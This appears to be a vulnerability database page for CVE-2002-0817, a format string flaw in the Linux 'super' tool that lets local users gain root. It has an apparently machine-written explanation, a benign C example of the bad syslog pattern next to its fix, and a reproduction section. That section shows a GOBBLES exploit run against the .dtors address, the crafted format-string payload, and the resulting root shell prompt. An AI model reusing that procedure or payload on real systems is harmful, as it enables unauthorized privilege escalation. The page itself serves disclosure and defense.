CVE-2002-0817
Description
Format string vulnerability in super for Linux allows local users to gain root privileges via a long command line argument.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
- cpe:2.3:a:william_deich:super:3.12:*:*:*:*:*:*:*
- cpe:2.3:a:william_deich:super:3.16:*:*:*:*:*:*:*
- cpe:2.3:a:william_deich:super:3.17:*:*:*:*:*:*:*
- cpe:2.3:a:william_deich:super:3.18:*:*:*:*:*:*:*
Patches
Vulnerability mechanics
Root cause
"The program incorrectly uses the syslog() function to log error messages, allowing format string specifiers to corrupt memory."
Attack vector
A local user can exploit this vulnerability by providing a specially crafted, long command-line argument to the `super` program. This argument contains format string specifiers that are passed to the vulnerable `syslog()` function. By carefully controlling the input, an attacker can overwrite arbitrary memory locations, potentially leading to arbitrary code execution with root privileges [ref_id=1].
Affected code
The vulnerability lies within the `super` program, specifically in how it handles error messages logged via the `syslog()` function. The `error.c` file contains the relevant code, where `SysLog(error_priority, buf);` passes user-controlled buffer content directly to `syslog()` without proper sanitization [ref_id=1].
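The logging pattern described above next to its standard correction, as an added example. This is not code from `super` or from its actual patch: `log_sink()` is a hypothetical in-memory stand-in for `syslog()` with the same printf-style contract, and the sample message is constructed.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

static char last_log[256];   /* output captured by the stand-in logger */

/* Hypothetical stand-in for syslog(3): same (priority, format, ...) contract. */
static void log_sink(int prio, const char *fmt, ...) {
    va_list ap;
    (void)prio;
    va_start(ap, fmt);
    vsnprintf(last_log, sizeof last_log, fmt, ap);
    va_end(ap);
}

/* Pattern the page describes: the message is used AS the format string,
 * so any '%' directive inside it is interpreted. Shown only, never called. */
void log_error_vulnerable(int prio, const char *buf) {
    log_sink(prio, buf);
}

/* Corrected form: constant format, message passed as data, logged verbatim. */
const char *log_error_fixed(int prio, const char *buf) {
    log_sink(prio, "%s", buf);
    return last_log;
}

/* Detection helper: count '%' directives in untrusted text ("%%" is literal). */
int count_directives(const char *s) {
    int n = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        n++;
    }
    return n;
}

int main(void) {
    /* Constructed sample input, not taken from a real log. */
    const char *msg = "No such super command as `xx%x%5$hn'.";
    printf("directives in input: %d\n", count_directives(msg));
    printf("logged verbatim:     %s\n", log_error_fixed(3, msg));
    return 0;
}
```

Compiling real `syslog()` call sites with `-Wformat -Wformat-security` flags the non-literal format form at build time.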
What the fix does
The advisory does not specify a patch or provide remediation guidance beyond upgrading to a fixed version. Therefore, the exact changes made to fix this vulnerability are not detailed in the provided information. Users are advised to consult vendor advisories for specific patching instructions or to upgrade to a secure version of the software.
Preconditions
- input: The attacker must be able to provide a long, specially crafted command-line argument to the `super` program.
- config: The `super` program must be compiled to use `syslog()` for logging error messages.
Reproduction
$ gcc GOBBLES-own-super.c -o GOBBLES-own-super
$ ./GOBBLES-own-super
Usage: ./GOBBLES-own-super -t <.dtors address> [ -o <offset> -A <allignment> ]
$ objdump -s -j .dtors /usr/local/bin/super
/usr/local/bin/super: file format elf32-i386
Contents of section .dtors:
 8063f7c ffffffff 00000000 ........
$ ./GOBBLES-own-super -t 0x8063f7c
. target @ 0x8063f80
. shellcode @ 0xbfffffb0
. username: 9 bytes
super: No such super command as `xx%.49103x%29$hn%.16305x%30$hn'.
sh-2.05#
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References